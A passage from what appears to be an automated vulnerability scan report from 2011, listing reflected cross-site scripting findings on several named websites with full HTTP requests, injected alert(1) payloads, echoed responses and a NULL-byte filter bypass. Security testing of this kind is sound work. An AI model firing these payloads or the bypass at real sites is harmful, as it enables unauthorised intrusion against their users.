person%5Bemail_address%5D=d6907"><script>alert(1)</script>be1276185b1&person%5Bfirst_name%5D=&person%5Blast_name%5D=&person%5Bcompany%5D=&commit=Sign+Up

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:47:18 GMT
Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.13
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14
ETag: "a9a6760d0cc907f88c1fb3c58401559b"
X-Runtime: 415
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9cb9d00be50b208d8cc589c89; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 3514
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getT
...[SNIP]...
<input id="person_email_address" name="person[email_address]" size="30" type="text" value="d6907"><script>alert(1)</script>be1276185b1" />
...[SNIP]...

5.22. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Bfirst_name%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.streamsend.com
Path:   /public/6EzE/J1l/subscribe

Issue detail

The value of the person%5Bfirst_name%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a021"><script>alert(1)</script>4ad34c01bc2 was submitted in the person%5Bfirst_name%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /public/6EzE/J1l/subscribe HTTP/1.1
Host: app.streamsend.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://app.streamsend.com/public/6EzE/J1l/subscribe
Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

person%5Bemail_address%5D=&person%5Bfirst_name%5D=9a021"><script>alert(1)</script>4ad34c01bc2&person%5Blast_name%5D=&person%5Bcompany%5D=&commit=Sign+Up

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:47:25 GMT
Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.13
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14
ETag: "276aee8fb26ed37db5432aef5dc7789b"
X-Runtime: 296
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9cb9d00be50b208d8cc589c89; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 3520
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getT
...[SNIP]...
<input id="person_first_name" name="person[first_name]" size="30" type="text" value="9a021"><script>alert(1)</script>4ad34c01bc2" />
...[SNIP]...

5.23. http://app.streamsend.com/public/6EzE/J1l/subscribe [person%5Blast_name%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://app.streamsend.com
Path:   /public/6EzE/J1l/subscribe

Issue detail

The value of the person%5Blast_name%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efa61"><script>alert(1)</script>06ada816a86 was submitted in the person%5Blast_name%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /public/6EzE/J1l/subscribe HTTP/1.1
Host: app.streamsend.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://app.streamsend.com/public/6EzE/J1l/subscribe
Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

person%5Bemail_address%5D=&person%5Bfirst_name%5D=&person%5Blast_name%5D=efa61"><script>alert(1)</script>06ada816a86&person%5Bcompany%5D=&commit=Sign+Up

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:47:33 GMT
Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8b PHP/5.2.2 mod_fastcgi/2.4.2
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14
ETag: "1cf055de6227ab98043bb84b5157023e"
X-Runtime: 373
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9cb9d00be50b208d8cc589c89; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 3578
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getT
...[SNIP]...
<input id="person_last_name" name="person[last_name]" size="30" type="text" value="efa61"><script>alert(1)</script>06ada816a86" />
...[SNIP]...

5.24. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 89adf<script>alert(1)</script>10099508dc9 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction89adf<script>alert(1)</script>10099508dc9&n=ar_int_p108883753&1316282696361 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:11:54 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction89adf<script>alert(1)</script>10099508dc9("");

5.25. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload ba3d5<script>alert(1)</script>4a7a4901935 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3ba3d5<script>alert(1)</script>4a7a4901935&c2=6034986&c3=SMGU-BNG-001-01-MRT&c4=224944440.225733735.224988341&c5=197083081&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AR&cb=1208617847
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 12:48:24 GMT
Date: Sat, 17 Sep 2011 12:48:24 GMT
Content-Length: 1291
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3ba3d5<script>alert(1)</script>4a7a4901935", c2:"6034986", c3:"SMGU-BNG-001-01-MRT", c4:"224944440.225733735.224988341", c5:"197083081", c6:"", c10:"", c15:"", c16:"", r:""});



5.26. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 30c0e<script>alert(1)</script>5fefccbc8e2 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=603498630c0e<script>alert(1)</script>5fefccbc8e2&c3=SMGU-BNG-001-01-MRT&c4=224944440.225733735.224988341&c5=197083081&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AR&cb=1208617847
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 12:48:25 GMT
Date: Sat, 17 Sep 2011 12:48:25 GMT
Content-Length: 1291
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"603498630c0e<script>alert(1)</script>5fefccbc8e2", c3:"SMGU-BNG-001-01-MRT", c4:"224944440.225733735.224988341", c5:"197083081", c6:"", c10:"", c15:"", c16:"", r:""});



5.27. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d29a7<script>alert(1)</script>a2d83874ca3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6034986&c3=SMGU-BNG-001-01-MRTd29a7<script>alert(1)</script>a2d83874ca3&c4=224944440.225733735.224988341&c5=197083081&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AR&cb=1208617847
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 12:48:27 GMT
Date: Sat, 17 Sep 2011 12:48:27 GMT
Content-Length: 1291
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6034986", c3:"SMGU-BNG-001-01-MRTd29a7<script>alert(1)</script>a2d83874ca3", c4:"224944440.225733735.224988341", c5:"197083081", c6:"", c10:"", c15:"", c16:"", r:""});



5.28. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ad33b<script>alert(1)</script>93c84afa312 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6034986&c3=SMGU-BNG-001-01-MRT&c4=224944440.225733735.224988341ad33b<script>alert(1)</script>93c84afa312&c5=197083081&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AR&cb=1208617847
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 12:48:28 GMT
Date: Sat, 17 Sep 2011 12:48:28 GMT
Content-Length: 1291
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
-){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6034986", c3:"SMGU-BNG-001-01-MRT", c4:"224944440.225733735.224988341ad33b<script>alert(1)</script>93c84afa312", c5:"197083081", c6:"", c10:"", c15:"", c16:"", r:""});



5.29. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload cd29c<script>alert(1)</script>6bf969815c1 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6034986&c3=SMGU-BNG-001-01-MRT&c4=224944440.225733735.224988341&c5=197083081cd29c<script>alert(1)</script>6bf969815c1&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AR&cb=1208617847
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 12:48:29 GMT
Date: Sat, 17 Sep 2011 12:48:29 GMT
Content-Length: 1291
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
acon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6034986", c3:"SMGU-BNG-001-01-MRT", c4:"224944440.225733735.224988341", c5:"197083081cd29c<script>alert(1)</script>6bf969815c1", c6:"", c10:"", c15:"", c16:"", r:""});



5.30. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 543f1<script>alert(1)</script>6bcd4c21fbd was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6034986&c3=SMGU-BNG-001-01-MRT&c4=224944440.225733735.224988341&c5=197083081&c6=543f1<script>alert(1)</script>6bcd4c21fbd HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AR&cb=1208617847
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 12:48:30 GMT
Date: Sat, 17 Sep 2011 12:48:30 GMT
Content-Length: 1291
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6034986", c3:"SMGU-BNG-001-01-MRT", c4:"224944440.225733735.224988341", c5:"197083081", c6:"543f1<script>alert(1)</script>6bcd4c21fbd", c10:"", c15:"", c16:"", r:""});



5.31. http://blekko.com/autocomplete [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 270f5<script>alert(1)</script>2627f1c1e5e was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?query=w270f5<script>alert(1)</script>2627f1c1e5e HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3; t=1316220316418

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:51:27 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Sun, 18 Sep 2011 02:51:27 GMT
Vary: Accept-Encoding
Content-Length: 71
X-Blekko-PT: df15f361ee300fac16a7f080511f5263

{"suggestions":[],"query":"w270f5<script>alert(1)</script>2627f1c1e5e"}

5.32. http://d7.zedo.com/jsc/d3/fl.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c957"-alert(1)-"8b1ee8e53ae was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/d3/fl.js?n=1318&c=43/41&s=17&d=9&w=300&h=250&l=http://clk.atdmt.com/go/328208374/direct;wi.300;hi.250;01;ai.234573933.234596024;ct.1/01%3Fhref=8c957"-alert(1)-"8b1ee8e53ae&z=707230601 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AM&cb=18890764
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24; PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "3a9d717-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Sat, 17 Sep 2011 13:26:20 GMT
Date: Sat, 17 Sep 2011 13:21:36 GMT
Content-Length: 2389
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


       
...[SNIP]...
172;m=82;w=47;i=0;u=unknown;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.atdmt.com/go/328208374/direct;wi.300;hi.250;01;ai.234573933.234596024;ct.1/01%3Fhref=8c957"-alert(1)-"8b1ee8e53aehttp://w3.newsmax.com/newsletters/crandall/videog.cfm?PROMO_CODE=CF19-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true
...[SNIP]...

5.33. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /lar/v11-001/d7/jsc/flr.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e07"-alert(1)-"00bf0ba6143 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lar/v11-001/d7/jsc/flr.js?n=1318&c=43/41&s=17&d=9&w=300&h=250&l=http://clk.atdmt.com/go/328208374/direct;wi.300;hi.250;01;ai.234573933.234596024;ct.1/01%3Fhref=63e07"-alert(1)-"00bf0ba6143&z=707230601 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=ENT9AM&cb=18890764
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24; PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1ea7ed1-4fbc-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=256
Date: Sat, 17 Sep 2011 13:22:04 GMT
Content-Length: 2389
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


       
...[SNIP]...
172;m=82;w=47;i=0;u=unknown;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.atdmt.com/go/328208374/direct;wi.300;hi.250;01;ai.234573933.234596024;ct.1/01%3Fhref=63e07"-alert(1)-"00bf0ba6143http://w3.newsmax.com/newsletters/crandall/videog.cfm?PROMO_CODE=CF19-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true
...[SNIP]...

5.34. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /img/badges/16x16-digg-guy.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0015cd3"><script>alert(1)</script>717828749f8 was submitted in the REST URL parameter 1. This input was echoed as 15cd3"><script>alert(1)</script>717828749f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

